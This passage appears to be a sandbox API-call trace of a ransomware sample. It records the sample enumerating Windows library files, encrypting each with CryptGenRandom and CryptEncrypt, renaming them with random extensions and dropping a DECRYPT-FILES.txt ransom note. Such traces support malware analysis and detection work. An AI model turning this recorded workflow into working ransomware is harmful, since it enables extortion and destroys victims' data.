returned 1 [0088.109] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0088.109] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.113] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.113] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.113] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.113] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0088.113] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.114] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.114] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.114] CloseHandle (hObject=0x44c) returned 1 [0088.114] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.114] WriteFile (in: hFile=0x448, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0088.115] CloseHandle (hObject=0x0) returned 0 [0088.115] CloseHandle (hObject=0x448) returned 1 [0088.115] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.116] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.116] GetTickCount () returned 0x114e782 [0088.116] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.116] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.116] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.116] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.117] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.117] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms") returned 81 [0088.117] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.Tl4X") returned 86 [0088.117] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.Tl4X" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms.tl4x"), dwFlags=0x0) returned 1 [0088.118] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.118] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.118] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.118] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b72060, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b72060, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b72060, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0088.118] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0088.118] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\jkbimi8.tmp" [0088.119] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.119] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.119] CloseHandle (hObject=0x0) returned 0 [0088.119] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.119] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89275ec, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xdd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.library-ms", cAlternateFileName="MUSIC~1.LIB")) returned 1 [0088.119] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0088.119] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Music.library-ms" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" [0088.119] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.119] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0088.120] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=3545) returned 1 [0088.120] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0088.120] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.121] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.121] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.121] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.121] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0088.121] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.122] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.122] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.122] CloseHandle (hObject=0x44c) returned 1 [0088.122] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.122] WriteFile (in: hFile=0x448, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0088.123] CloseHandle (hObject=0x0) returned 0 [0088.123] CloseHandle (hObject=0x448) returned 1 [0088.123] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.124] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.124] GetTickCount () returned 0x114e792 [0088.124] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.124] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.124] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.124] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.125] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.125] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms") returned 77 [0088.125] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.KCA0") returned 82 [0088.125] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.KCA0" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms.kca0"), dwFlags=0x0) returned 1 [0088.125] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.126] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.126] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.126] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xdfb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures.library-ms", cAlternateFileName="PICTUR~1.LIB")) returned 1 [0088.126] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0088.126] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Pictures.library-ms" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" [0088.126] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.127] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0088.127] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=3579) returned 1 [0088.127] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0088.127] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.128] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.128] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.128] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.128] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0088.128] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.129] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.129] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.129] CloseHandle (hObject=0x44c) returned 1 [0088.129] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.129] WriteFile (in: hFile=0x448, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0088.130] CloseHandle (hObject=0x0) returned 0 [0088.130] CloseHandle (hObject=0x448) returned 1 [0088.130] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.131] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.131] GetTickCount () returned 0x114e792 [0088.131] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.131] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.131] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.131] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.132] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.132] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms") returned 80 [0088.132] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.KCA0") returned 85 [0088.132] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.KCA0" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms.kca0"), dwFlags=0x0) returned 1 [0088.132] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.133] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.133] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.133] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89275ec, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xde6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 1 [0088.133] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0088.133] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Videos.library-ms" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" [0088.133] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.134] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0088.134] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=3558) returned 1 [0088.134] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0088.135] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.135] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.135] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.135] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.136] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0088.136] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.137] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.137] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.137] CloseHandle (hObject=0x44c) returned 1 [0088.137] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.137] WriteFile (in: hFile=0x448, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0088.138] CloseHandle (hObject=0x0) returned 0 [0088.138] CloseHandle (hObject=0x448) returned 1 [0088.138] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.139] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.139] GetTickCount () returned 0x114e7a1 [0088.139] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.139] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.139] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.139] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.140] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.140] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms") returned 78 [0088.140] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.ISH3V") returned 84 [0088.140] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.ISH3V" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms.ish3v"), dwFlags=0x0) returned 1 [0088.141] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.141] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.141] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.141] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89275ec, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xde6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 0 [0088.141] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.141] CloseHandle (hObject=0x440) returned 1 [0088.141] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0088.142] lstrcmpW (lpString1="Network Shortcuts", lpString2=".") returned 1 [0088.142] lstrcmpW (lpString1="Network Shortcuts", lpString2="..") returned 1 [0088.142] lstrcatW (in: lpString1="Network Shortcuts", lpString2="\\" | out: lpString1="Network Shortcuts\\") returned="Network Shortcuts\\" [0088.142] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Network Shortcuts\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\" [0088.142] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\jkbimi8.tmp") returned 81 [0088.142] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\network shortcuts\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0088.142] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 69 [0088.142] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.142] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\DECRYPT-FILES.txt") returned 87 [0088.142] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\network shortcuts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0088.142] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.143] CloseHandle (hObject=0x444) returned 1 [0088.144] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 